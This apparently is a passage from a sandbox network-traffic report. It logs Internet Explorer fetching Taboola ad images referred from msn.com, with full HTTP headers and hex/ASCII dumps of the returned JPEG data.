2021-10-07 13:51:55 UTC	37	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	38	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17316 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 320725624966224040689221604209161944030,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "70e7a9513624839b604443b3b54043d6" last-modified: Sat, 21 Aug 2021 20:30:14 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 99 x-ratelimit-reset: 1 x-request-id: 6f4228e5a35dd1d92b2ea2259ea618a2 x-envoy-upstream-service-time: 130 X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb203 Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Via: 1.1 varnish Age: 1489024 X-Served-By: cache-wdc5527-WDC, cache-mxp6937-MXP X-Cache: HIT, HIT X-Cache-Hits: 1, 1 X-Timer: S1633614715.271185,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png X-vcl-time-ms: 1
2021-10-07 13:51:55 UTC	40	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 06 00 02 07 01 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 66 de a6 47 85 e9 59 84 b2 d3 28 ae 61 64 92 Data Ascii: JFIF""$$6&&6>424>LDDL_Z_\|\|""$$6&&6>424>LDDL_Z_\|\|7"3fGY(ad
2021-10-07 13:51:55 UTC	41	IN	Data Raw: c6 8b 60 cc ca b0 a9 b3 15 e9 34 4c c8 76 31 6f 99 0e 8d c0 cc 54 6e 4e 65 26 1d a3 33 96 8e c0 cc 7e 36 f5 7c ca ca 1b 2e 65 d0 99 b3 1c 2c 57 99 8c 69 b3 29 bf ff c4 00 29 10 00 03 01 01 00 01 05 00 02 02 03 00 03 01 00 00 02 03 04 01 05 12 00 06 11 13 14 21 22 15 23 07 16 31 24 33 41 44 ff da 00 08 01 01 00 01 09 00 2a f4 cb f9 f5 cd e9 31 6d d5 63 2a 3d dd 2c cf 41 84 59 b9 e9 02 79 f1 a5 ea a0 1c ff 00 cf 5a c3 11 fe 35 b4 7c 49 bf c0 97 91 67 a8 7e 4b cb 3d 29 df 19 99 b9 03 17 88 cd dc e8 67 da dc 10 0e 82 49 05 e2 42 39 f6 b7 03 3d 30 34 5a 63 ea 0a d4 97 6a dc bf 72 43 f9 27 5f d3 4d 6f 56 c0 0b c5 35 bf db e7 73 68 f1 f8 f4 54 ef 97 a0 6e fc ff 00 e8 d3 f1 f1 e8 6e a4 c7 c4 cb e5 0c 66 7d 81 8d f8 df 4b 36 69 7c 86 74 b1 5b c1 9f a0 aa 20 7f ea Data Ascii: `4Lv1oTnNe&3~6\|.e,Wi))!"#1$3AD1mc=,AYyZ5\|Ig~K=)gIB9=04ZcjrC'_MoV5shTnnf}K6i\|t[
2021-10-07 13:51:55 UTC	42	IN	Data Raw: fc af 7b 5c f3 55 7f ab 94 1c c5 dd 7e cd e8 15 cf e0 49 41 70 c8 27 2d c9 dc e6 ad f0 d7 a0 85 58 de a1 10 bf 74 0b a6 e2 17 02 dc 3d 63 60 16 06 f7 38 17 8f 33 ef e1 f4 fd 95 cb f6 ef 67 87 0f 46 38 3d d1 ce 30 f6 d6 cb ca f7 e4 d6 dd cd 86 4f aa 88 fd f5 ef 6c fb f6 3e cd 9f f2 04 4e e1 64 94 4d da 1f 6c 3a 6e 2b 78 43 ee 5f 60 5e fe 1f 2a f8 a0 a4 a9 63 b0 69 ce 87 32 1d 8e 3d e5 b2 40 a8 8c 19 92 57 ec 84 18 fe 03 f7 67 b9 b8 c5 c8 ae 60 cf 72 45 51 45 fa 26 77 a9 bb 71 b6 7d 84 1d 6f 5e 89 8d 6e 41 f1 fd c5 42 af 68 ba be 57 52 ca ea cc 9a 5b 49 ee e6 b3 a1 2f 3f db 5d de da df c9 e8 d4 94 c6 c4 fe fe 74 f7 74 5f f1 4a d7 ae 54 d2 68 92 85 45 8b 9d 04 9c 60 f5 40 1c 23 a3 28 88 bf 4b 14 4d c3 21 0c 0e 74 10 cf d2 ff 00 2e d9 fb 5d e1 8a 0a 55 d9 e4 Data Ascii: {\U~IAp'-Xt=c`83gF8=0Ol>NdMl:n+xC_`^*ci2=@Wg`rEQE&wq}o^nABhWR[I/?]tt_JThE`@#(KM!t.]U
2021-10-07 13:51:55 UTC	44	IN	Data Raw: a8 f1 99 81 5c d5 be 5c 5f d7 bc 74 fd 9f 9d 23 3c 7c f5 d0 49 ac 97 1b 14 a6 34 8c 5a da 34 85 85 b9 68 11 99 92 8d df 0a a3 68 8d b4 ce a6 cb f2 44 53 b5 55 01 6f 41 4c d1 2f cc a8 55 47 fb 7e bc e3 4a 31 fd ca 2c 9d a5 a0 02 a8 20 6e f8 7d cd 1c 1d 22 fb 09 b3 96 bb 18 b3 98 3e 0c 37 18 56 34 be 7e 4a 45 51 87 aa 61 3b 9b 30 b7 01 47 47 d8 18 43 f5 53 64 92 a1 a7 5f a3 72 5e 54 b6 34 9b 1c 92 4e b3 18 9a 36 8d d9 75 14 b7 f5 06 7c 7f 90 b3 f7 0b 45 6d a8 a9 75 21 5a 9f a9 ad 0b 10 9d 72 0f d3 89 61 be 25 8e 6e e9 54 38 93 1f a5 b0 af 0c 81 c7 4b ec 33 dc 99 ce 97 f0 d0 60 14 fa fc 69 39 06 74 3a 16 d3 21 1a a9 58 81 25 ab 02 28 b9 fb be 46 f1 4b 59 8c f0 cd 13 d2 0c c5 e0 19 e6 79 34 a6 cd 61 e0 fc 1c 85 f5 ee 61 73 54 27 98 a3 2a a5 88 3e d2 5b 3a 7d Data Ascii: \\_t#<\|I4Z4hhDSUoAL/UG~J1, n}">7V4~JEQa;0GGCSd_r^T4N6u\|Emu!Zra%nT8K3`i9t:!X%(FKYy4aasT'*>[:}
2021-10-07 13:51:55 UTC	45	IN	Data Raw: 4c b1 65 f7 31 2c b5 f9 be 2b 88 02 72 c2 51 c4 0d c0 69 0a e1 3c fe fb 93 a2 75 69 b1 ae 69 0b 3e c1 c0 64 f3 27 35 9a b4 f9 74 1a 0c 37 b9 ce 6e 62 0b 06 2e e4 51 a0 17 ce a3 8d 78 23 9f 5b 99 d6 9c a4 b1 a9 99 d1 74 55 8a f0 f9 5f 5b 31 6d ca b1 4a 9e ac 70 53 4e 83 9f f7 86 b3 af d3 3e 34 b2 00 ad 1d 95 cc 5a ba eb 7f 46 b0 43 90 77 c6 a7 b5 08 a8 ac 67 80 44 2d f8 53 33 f0 a2 6c 98 2a 74 b9 f7 e2 64 f9 d3 df bb 5f fe b0 d7 9d 5b d2 f8 58 ee 3a 4e 8c a1 30 62 7d 53 5c e6 bd 4b 1a 8c 01 48 78 96 a3 33 f9 cf 43 0c 94 f8 8e 0d f3 be 69 1d 8b 42 ae b9 64 5f ab d3 6c 6e e2 b1 7e b9 fd 45 4f 3a 69 33 5f bc fa 8e 9d 21 b4 f5 7b 07 44 6a 88 4d 96 a1 5a 33 9e ca ac fd 1f 0b 60 ab 4d 99 50 e1 cc 6c a4 3e a6 b1 8b 9f e4 cf d7 be a1 e4 2b da f2 d9 67 32 25 74 e9 Data Ascii: Le1,+rQi<uii>d'5t7nb.Qx#[tU_[1mJpSN>4ZFCwgD-S3l*td_[X:N0b}S\KHx3CiBd_ln~EO:i3_!{DjMZ3`MPl>+g2%t
2021-10-07 13:51:55 UTC	46	IN	Data Raw: dc 27 d2 9e 60 7e f4 1b f5 4e 9d dd ce c3 12 4c f1 22 6f 9e eb 4f 66 e7 1d 38 7a 1e 84 85 25 f5 33 7e e2 d2 f8 c2 c4 b7 c7 19 b8 a2 59 b3 f9 d4 e0 6a f7 e4 a7 78 63 3c 44 98 7b e1 bf c3 b7 77 ff 00 44 46 9f bf e3 41 33 81 ef aa 97 83 9f c1 15 3b 99 a3 be a6 f8 6a f4 be 79 ec f1 1c f9 27 df 2c 89 fb 9e df 77 af bf d4 2e 4d 60 af f8 d7 8d c9 f7 37 1b bd 0d 52 dd ed 5b bd b5 df 85 75 6a 9a c5 6f 89 05 00 4b c1 2d c2 31 31 f8 dc fa 58 59 a4 2a 0b 35 ba 0a a3 68 5a 45 f8 2a f4 b8 5b e6 cd dd 61 34 fc f0 74 97 80 5f f8 3e 58 62 5e 9d 55 0d 56 2f 0c 65 2f 31 f5 ff 00 c8 03 1c dd 9b 25 5a 07 d6 9e 10 f9 61 4d 88 6f 99 79 30 98 42 3a 59 ab 78 7f b0 76 a1 36 7c 6e 13 62 a1 41 e6 5e 94 c1 05 fc 7c 8f 43 14 b2 cf 5d af 70 85 ed 46 ef a9 c2 eb a0 96 41 df 62 de df 6d Data Ascii: '`~NL"oOf8z%3~Yjxc<D{wDFA3;jy',w.M`7R[ujoK-11XY5hZE[a4t_>Xb^UV/e/1%ZaMoy0B:Yxv6\|nbA^\|C]pFAbm
2021-10-07 13:51:55 UTC	48	IN	Data Raw: f2 80 22 6e 2c 51 84 81 62 a6 c9 af 9e 83 06 e7 95 7f d2 74 13 60 dc b3 2d 4f b9 70 c2 78 87 6f 54 66 c1 7c cc 79 18 dd 0f 50 1d d4 7f 6f 01 61 7c a4 1a e9 81 9c b1 d8 f9 13 8a 6c 35 d7 b8 cc 9f ca c7 61 e6 59 03 63 d3 17 c8 3e 3d f2 6d d2 76 bb 97 fd 2f b0 7e 4d d3 42 36 4d 4d 08 1c 93 d9 89 88 f1 17 26 3f ac 12 00 e4 2d d6 21 88 17 e6 a0 0b a6 a1 b7 e7 b8 e3 83 95 71 56 ca 9d 47 44 d7 95 50 a4 54 a0 63 70 c6 a3 fd 04 5c 00 0e f4 c3 86 c7 90 22 82 84 5d 18 b9 2f 18 5e 41 b9 3c 8e fa 39 56 46 da e3 33 70 76 33 b2 84 01 7a 04 2e e3 cd 4d 9a bc cb c9 e4 18 6e ac b4 0a 4c 08 0f 4c 20 01 42 68 40 04 0e c0 f7 92 a2 1e 4c d8 c9 1b 01 d8 99 c5 af 58 91 e6 0e d9 2f 64 fe a7 d6 d7 64 dc d9 ae aa 6e e0 d1 a8 5d 35 ec 25 4a d0 32 98 90 23 12 39 37 04 79 8e 2b a2 21 Data Ascii: "n,Qbt`-OpxoTf\|yPoa\|l5aYc>=mv/~MB6MM&?-!qVGDPTcp\"]/^A<9VF3pv3z.MnLL Bh@LX/ddn]5%J2#97y+!
2021-10-07 13:51:55 UTC	49	IN	Data Raw: 6e 07 39 24 70 4d 22 84 8a 6a f5 19 24 f8 8c ae 9d 5f dc 01 55 d2 4f 92 32 21 d0 95 7f f5 1b dd a9 47 c8 13 d8 9e d8 92 b0 4d 51 98 f6 08 c7 83 8a c8 ee 4f aa 0d 10 5b 81 86 46 e8 82 80 d1 ca 19 19 8e fe d2 79 c7 0c 24 f7 c5 54 54 1e fe ea 19 a7 d2 85 57 50 8c 53 5e fb e0 05 e1 56 0a 74 90 03 ae c0 f2 32 e3 33 05 2a 0f 20 7e 3b 61 8e 08 ba 65 51 be e5 8e e4 e7 c4 ef 8a 36 aa 02 87 ec 6c 9f 1b 60 1b f6 fd ae 86 6e 7f 6e 39 c4 d3 2a 35 30 36 75 2f 6a 18 90 2c a8 8a cb 22 ec c2 bb 06 c8 f5 cc 81 d2 20 8a c2 27 e1 82 31 d8 36 19 bf 4f 3a e3 24 30 d6 a6 a8 6a 0b c5 11 9f c5 4d 24 d3 c6 d2 2b 84 61 6d ed 1f 60 67 5c 7a 8e 92 73 d3 c7 1b 85 9c 46 0a 51 04 ef 5f 55 92 a1 49 03 4a 86 36 bf 40 8b 67 2b b1 23 b9 c3 ff 00 76 ce f2 47 d3 ce c1 c0 ea 4a 35 5a 8c 94 37 Data Ascii: n9$pM"j$_UO2!GMQO[Fy$TTWPS^Vt23* ~;aeQ6l`nn9*506u/j," '16O:$0jM$+am`g\zsFQ_UIJ6@g+#vGJ5Z7
2021-10-07 13:51:55 UTC	50	IN	Data Raw: d4 a3 8c fd 3e 0e 9f ad bb ea 99 bf f0 db 29 70 cc fd 89 22 b2 22 b1 74 bd 1a 47 1e ec 41 e9 96 8b 6e 17 9d 39 d0 08 ba e9 24 91 7d 28 4a 4b d0 3c 4e a9 a2 62 9a b4 a4 8b be 41 fa b4 5d 1f 48 7a be a7 a9 69 dd 75 22 b5 18 a2 2d cb d3 67 4f 0f 47 0f 4a fd 52 47 d6 20 91 a6 f4 bf fb 55 d8 fd 80 79 ce 94 74 72 f4 b1 cb 17 48 9d 42 82 8a 6b d5 d4 bb 70 0e 18 04 2c ed 14 e3 41 0e 75 7a 6d 13 d7 0d 64 6f 90 c6 1b ad 44 ea 20 ea 10 33 c9 0c 83 76 5d 2a 41 1a b8 1c e2 b4 fd 4c 15 d3 11 b4 a5 25 e3 de bc eb 1b 9c fd 4e 7f d6 d9 62 88 8e 9e 53 a6 00 37 75 1a ac 38 c8 4c 4f ea 09 50 ab 2b 25 6d ce c0 8c 8d 62 85 16 38 96 95 4e 95 17 bd 1a ed 9a b6 50 1c 70 eb f8 fa c4 45 20 91 b5 92 2b c0 c5 e3 41 3c 03 9d 4c 0c e4 34 bd 24 6e e9 0c ac 3e b8 d5 91 0f fb 43 d2 74 92 Data Ascii: >)p""tGAn9$}(JK<NbA]Hziu"-gOGJRG UytrHBkp,AuzmdoD 3v]*AL%NbS7u8LOP+%mb8NPpE +A<L4$n>Ct
2021-10-07 13:51:55 UTC	52	IN	Data Raw: 15 cf 38 ad 2c 94 24 4d ea 87 6d ab 6c 95 bd 56 d6 ab 4c 10 10 76 dd 4e 3a bb 47 bb 0f 8e de 01 ba c4 92 1e e4 25 1a f2 45 e4 56 38 90 6c 47 de 11 20 6f 1b 30 ec 70 6b 6a 20 d5 90 30 97 ff 00 01 7f 27 be 23 a9 dc 0b 20 1f bc 04 f4 d1 dc 30 98 d4 7c df 4a b6 be 18 01 9e bb 3a 82 16 81 4d f9 3c ea 35 8c 8b 3c 66 45 45 36 11 93 c7 d3 0c 96 5d 03 dc 37 5d 35 de b1 4a 3a 5b 46 2a c9 3f 9e ff 00 79 23 4e 51 40 0e e4 0a ff 00 9b 6d f0 43 22 26 ec 6d 55 47 d6 fb 63 4b d4 09 1a 9f 48 b6 1f 91 b1 19 33 f4 b2 59 89 1e 25 5f 77 6b aa c4 f4 a8 99 19 ad 1a c1 e0 78 c0 16 62 34 58 d8 8f ae 31 e6 42 59 c6 92 2c 0e 77 bb c0 0d fb 91 c3 52 f9 07 17 59 20 da 8a 0d 88 34 2d 33 6a 21 b3 a8 45 1f 18 92 ab fc 8c f5 64 6a 23 48 d2 14 f6 b1 96 bb 69 0b 44 27 6d cf 00 e2 80 64 24 Data Ascii: 8,$MmlVLvN:G%EV8lG o0pkj 0'# 0\|J:M<5<fEE6]7]5J:[F*?y#NQ@mC"&mUGcKH3Y%_wkxb4X1BY,wRY 4-3j!Edj#HiD'md$
2021-10-07 13:51:55 UTC	53	IN	Data Raw: cd ef 62 77 db be de 6f 09 67 6b 27 7a 15 e6 eb 8c b6 ad e8 50 bc 37 cf 18 01 f2 31 0a 80 7d 5d 4b b9 fc 62 c7 a5 40 d6 e6 81 c3 34 aa c4 07 0f b0 3f 59 29 9a 5b 55 24 dd 8b e3 c0 c5 a8 d3 9f 2b c0 1f 9c 72 08 20 85 02 f6 17 7b d6 11 1a a5 94 20 7a 8a 72 46 d0 69 14 12 59 1b f0 bd b3 a8 eb 01 8b 4c 96 a5 f4 76 d4 d8 b2 8a 3a 76 bf ae 7c 8f 19 4b 60 6d ec d1 da f4 9c 0f 2a a0 56 ec 5c 03 78 0b a1 0e d1 b6 de dc 75 f6 10 8f b7 b2 cd 11 47 1c f5 0e e3 70 de da fa 18 b2 20 da 30 1e cc 60 0b a6 b0 37 c5 49 49 34 e1 9b 52 8a b6 2b a7 82 72 58 f4 4e 4a 6f ba e9 1a 40 d5 8c 58 2d 1d e8 83 54 05 e5 3b a1 0e cc f6 68 ed 5d c0 e3 18 aa a8 0b a5 8f b7 7e fc 83 80 39 1b b0 17 be 2e af 37 86 e8 ec 31 81 40 0b 15 05 b3 4a d6 ee 6a b6 c4 ea 25 86 3d 5a 35 11 ac 0f 07 b9 Data Ascii: bwogk'zP71}]Kb@4?Y)[U$+r { zrFiYLv:v\|K`m*V\xuGp 0`7II4R+rXNJo@X-T;h]~9.71@Jj%=Z5
2021-10-07 13:51:55 UTC	54	IN	Data Raw: 84 03 fd 6d bb 1a 3d 87 6c 60 e6 8e b7 4c 2f 37 22 4e 05 fd 56 4b 1f a5 b2 30 6b 2c c3 f3 9a 1c 7c ca ea 60 c7 ce f9 18 01 43 49 aa 4d 98 5d 10 00 ad f7 e3 1d 18 46 56 49 12 2a 04 ad 05 3f 86 ee 70 ac 31 48 74 06 75 6d 81 de 80 e2 b3 d4 31 f4 e2 cb 1d c0 51 54 3c ed 8a e8 42 a8 d7 b7 03 eb 20 86 2f 0b 76 71 66 e9 52 a4 90 a1 f4 db 6d f9 39 38 86 47 d2 54 31 d0 51 0f b6 fc 91 8c d1 87 b3 ad 48 5b 03 8a ef 89 a1 63 d2 c1 85 5a df 1a 6f 9c 67 ea 66 ea 41 55 4d 23 f9 68 bb 6c db dd e3 19 d9 0a a2 93 aa 80 f0 a3 00 80 0f e6 6a 04 b1 62 36 d2 46 2c 29 d2 28 68 67 52 cc e3 59 f1 ce 3c 92 c8 f2 ea 79 06 82 80 70 02 f6 03 c6 3c c8 aa 4e 82 80 53 39 a1 4c 2f b5 61 00 ad f3 78 08 75 3e df 14 48 df 38 52 77 1c d9 ad 8f 7c 30 16 14 08 6b 1f e3 19 83 b5 1b ee 4e 21 d3 Data Ascii: m=l`L/7"NVK0k,\|`CIM]FVI*?p1Htum1QT<B /vqfRm98GT1QH[cZogfAUM#hljb6F,)(hgRY<yp<NS9L/axu>H8Rw\|0kN!
2021-10-07 13:51:55 UTC	56	IN	Data Raw: 80 a5 c2 d1 b0 f7 01 f5 8a 1b 80 be 06 03 60 8d c6 52 d7 38 0b ed 60 e0 b6 b6 ae 36 c7 8d 50 15 24 70 73 7a df 07 ac c0 10 2f 81 88 a8 0f aa d2 b7 c7 12 51 3b d0 74 f8 90 70 b4 a4 95 3e eb e7 cf d8 c7 89 43 11 a9 0d d8 23 b8 f3 81 dd 57 db 23 ae ff 00 77 9a 64 e6 be bf 03 15 40 8c 9d 2d c3 7f ca 3c 1c 60 81 8d 12 6f fc e0 16 b4 bf 9c dd b6 f3 59 c6 d8 41 08 7b 60 4a 3c 1c 0d 78 a3 6b db 09 00 61 0c c4 de 56 6b f6 93 58 a5 89 1b 78 bc 1a 94 6f 59 a8 f2 e3 be fc 66 94 35 69 df 14 01 96 c5 4f a4 be 4e 19 91 a5 02 74 e0 05 3d b0 04 76 0c a8 fc 05 61 c6 34 7e 95 98 90 36 ad 2c e4 77 c6 96 0f 4d 82 85 6d 27 59 fe ac 8e 4b 85 1f a7 12 f6 1b 87 18 0a 21 f6 aa f0 73 6a 1b 8e 32 46 ea fd 4e c7 db a6 b1 42 ef ed cd bc e0 5b cf ce 02 74 de 05 05 80 24 e7 b7 55 06 c0 Data Ascii: `R8`6P$psz/Q;tp>C#W#wd@-<`oYA{`J<xkaVkXxoYf5iONt=va4~6,wMm'YK!sj2FNB[t$U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49848	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:55 UTC	37	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	162	IN	HTTP/1.1 200 OK Connection: close Content-Length: 32418 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 623575638407919105839610360858388108163,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "d82bcf09d0447acaffb27abbcaccf36b" last-modified: Thu, 16 Sep 2021 20:08:16 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 98 x-ratelimit-reset: 1 x-request-id: 9a81f5ce20284f24938456f7f27a5940 x-envoy-upstream-service-time: 83 X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb202 Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Via: 1.1 varnish Age: 1734082 X-Served-By: cache-wdc5568-WDC, cache-mxp6930-MXP X-Cache: HIT, MISS X-Cache-Hits: 1, 0 X-Timer: S1633614715.284840,VS0,VE264 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png X-vcl-time-ms: 264
2021-10-07 13:51:55 UTC	163	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 0a 0a 0a 0a 0b 0a 0c 0d 0d 0c 10 11 0f 11 10 18 16 14 14 16 18 24 1a 1c 1a 1c 1a 24 36 22 28 22 22 28 22 36 30 3a 2f 2c 2f 3a 30 56 44 3c 3c 44 56 64 54 4f 54 64 79 6c 6c 79 98 91 98 c7 c7 ff ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 00 04 05 07 08 03 02 01 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 4d 69 07 d4 7a 04 08 10 20 40 81 0d 02 Data Ascii: JFIF&""&0-0>>T$$6"(""("60:/,/:0VD<<DVdTOTdylly74Miz @
2021-10-07 13:51:55 UTC	164	IN	Data Raw: 83 47 42 c9 5b 44 cb 56 88 7e 67 f0 7a 2e 53 0d d7 17 4e 02 75 c8 35 c9 49 6f 52 b2 e3 59 f0 43 05 a8 04 a5 1c 04 95 26 a1 b4 f1 0c f2 d6 cc 4c 37 7c c0 2e 4c e5 aa 56 60 9a 23 15 5c d0 d8 ee 1d 51 e9 a6 43 06 70 d9 9c 85 38 ac fe 6c ac 29 2b 8f ad 13 05 c2 ab 43 e4 ae 7c b7 79 51 1d b6 7c 11 41 81 13 54 0b 54 bd 13 e8 b2 50 59 73 99 a3 47 e3 ae ea 3b 07 39 ae 63 9d 4e 2a f2 f8 9b a2 bd 93 72 d9 a5 b9 f4 bf 30 bc fd b4 16 5a be a2 ae a8 64 82 fc cd d6 07 34 80 79 d2 eb b8 fd 0e 93 38 01 28 b1 96 1d 18 5b a7 0e 22 f0 39 41 cf 35 c8 71 62 27 d2 27 e2 ed 4c ef 88 ad 64 ef 38 61 97 21 61 8f 6a 24 99 fa 08 9e 91 8a e1 8e 9c 65 86 54 f0 6a 12 d5 a9 8d e0 48 e9 c2 9d fc 12 a3 70 38 82 0b 28 bc ee 27 f3 d5 fe 75 0a 06 ed 5f 75 38 f7 ae 34 77 9f d3 09 81 9c bb 31 Data Ascii: GB[DV~gz.SNu5IoRYC&L7\|.LV`#\QCp8l)+C\|yQ\|ATTPYsG;9cN*r0Zd4y8(["9A5qb''Ld8a!aj$eTjHp8('u_u84w1
2021-10-07 13:51:55 UTC	166	IN	Data Raw: c0 83 88 0e 00 1a 59 34 5a cc b6 66 94 16 08 c4 b9 82 1d 05 97 d6 ae b5 12 0f 93 2c 10 b8 42 a6 31 1e b6 dd bd fa b9 5e 08 88 4c 9f 0f f9 dc 8b 64 cd 42 01 da 21 d4 c2 85 99 96 2e b1 ea b4 60 e7 5a 62 ef aa cb 6d 19 a0 b6 2f e8 37 30 e1 6a 64 75 4e 57 68 7b 34 11 aa 51 76 a5 58 ab 10 c6 11 ee 26 d4 80 61 9b 4d ca 51 50 63 67 1a 59 85 6e b7 84 5f 41 16 5c ec 57 0b 6f 62 a1 33 74 9a 5a 87 73 73 bf 5f 99 10 75 d1 64 e4 77 a1 64 9f 30 07 29 22 0e 7e 30 44 2a 97 31 7c 39 81 aa 10 7e 60 44 ca a1 c1 0c 16 f1 56 f0 e2 12 08 68 e3 8f 15 12 f3 77 81 c1 22 c4 34 53 80 4e fa 4a 36 f1 56 e5 d7 31 9a ba 38 61 f6 fa 56 31 78 24 e9 e5 d0 66 fa 44 bf 11 c3 9d 1b cc a0 29 4a 84 9b 75 9a 76 01 a2 8b 79 2f 46 30 88 f2 72 39 b5 a8 8a 88 ac cd 99 1b c9 ac cf ac 33 92 22 46 ab Data Ascii: Y4Zf,B1^LdB!.`Zbm/70jduNWh{4QvX&aMQPcgYn_A\Wob3tZss_udwd0)"~0D*1\|9~`DVhw"4SNJ6V18aV1x$fD)Juvy/F0r93"F
2021-10-07 13:51:55 UTC	167	IN	Data Raw: b2 0d 45 f5 be 01 41 8c 35 16 ba da eb f0 9d 04 09 c8 5c 34 0b 97 24 aa 0c da ee 9a 29 0a d5 a4 3e cd 5b 51 c5 eb 4c c1 da bc b1 8f 58 22 b1 29 a8 d4 15 82 e5 6b 6b 89 a1 0c c5 94 f7 48 49 0c d6 a6 73 b2 98 dc c7 d2 14 b9 1c 48 2a 22 4e ad eb 2b 88 b1 1d ad 76 ab 36 7a 0e 08 51 35 a8 8a 36 01 21 c3 49 5d 5a 61 5f 60 21 b5 b3 71 ea ab 09 3e 2a d1 12 88 72 72 92 9f 38 44 2e b1 b2 ae c4 c5 12 95 42 93 0a 88 55 e7 f3 02 70 fa 23 12 ae 92 d7 a2 46 cf a3 5b 44 b3 8e b0 2f 4e d2 5e 8d bd 62 4d 3d 03 1c b8 20 ad 35 d0 e1 6e 91 80 88 3d 1d bd a8 58 26 6a 0a 18 92 af f1 32 ca c4 6d 17 b2 c8 fe 26 54 b4 df 32 3e 95 b7 39 f1 5a b0 36 77 68 43 0b d7 8f 76 67 8b 16 a6 ae ef 78 e2 c9 52 c4 08 28 01 fa 64 ec f7 06 4f fb 7b 56 9d 3a 41 d6 d7 d9 d0 6d 0d 06 64 6d 9a cb 80 Data Ascii: EA5\4$)>[QLX")kkHIsH"N+v6zQ56!I]Za_`!q>rr8D.BUp#F[D/N^bM= 5n=X&j2m&T2>9Z6whCvgxR(dO{V:Amdm
